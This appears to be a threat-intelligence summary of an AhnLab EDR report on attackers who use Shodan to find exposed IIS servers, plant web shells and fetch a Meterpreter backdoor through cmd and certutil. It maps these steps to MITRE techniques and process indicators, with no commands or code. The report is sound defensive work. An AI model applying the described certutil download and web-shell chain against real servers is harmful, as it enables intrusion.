Threat actors leverage search engines like Shodan to discover externally exposed targets and plan initial access to services such as IIS. AhnLab EDR discusses detection and response for such attempts, highlighting behaviors like web shells and the Meterpreter backdoor. #AhnLabEDR #IIS #WebShell #Meterpreter #Shodan #MeshAgent #MSQL #Redis
Keypoints
- Threat actors use Shodan and similar tools to identify vulnerable external targets for initial access.
- IIS web servers with vulnerable versions are targeted, with attackers installing web shells or executing malicious commands.
- The Meterpreter backdoor can be downloaded via standard Windows utilities (cmd and certutil) and executed through the web server process.
- Logs show detection of command shell activity (cmd) and certutil usage tied to a web shell scenario.
- AhnLab EDR emphasizes attack surface management and patching to prevent exposure of assets like IIS, MS-SQL, Redis, and MeshAgent.
- The article highlights EDR capabilities for continuous monitoring, analysis, and threat hunting to respond to initial access events.
MITRE Techniques
- [T1046] Network Service Scanning โ Threat actors identify targets using search engines like Shodan; โThreat actors can use these search engines to engage in malicious behaviors such as collecting information on attack targets or performing port scanning attacks against any devices.โ
- [T1190] Exploit Public-Facing Application โ When a web server with a vulnerable version is identified, they exploit a vulnerability appropriate for the version to install web shells or execute malicious commands. โWhen a web server with a vulnerable version is identified, they exploit a vulnerability appropriate for the version to install web shells or execute malicious commands.โ
- [T1105] Ingress Tool Transfer โ Meterpreter backdoor was downloaded through normal Windows utilities (cmd and certutil). โMeterpreter backdoor was downloaded through normal Windows utilities (cmd and certutil).โ
- [T1059.003] Windows Command Shell โ cmd.exe was launched by the w3wp.exe process. โcmd.exe was launched by the w3wp.exe process.โ
- [T1505.003] Web Shell โ Meterpreter backdoor was executed via a web shell. โMeterpreter backdoor was executed via a web shell since cmd.exe was launched by the w3wp.exe process.โ
Indicators of Compromise
- [Process] context โ cmd.exe, w3wp.exe, and certutil usage observed in web shell activity and Meterpreter deployment
Read more: https://asec.ahnlab.com/en/65390/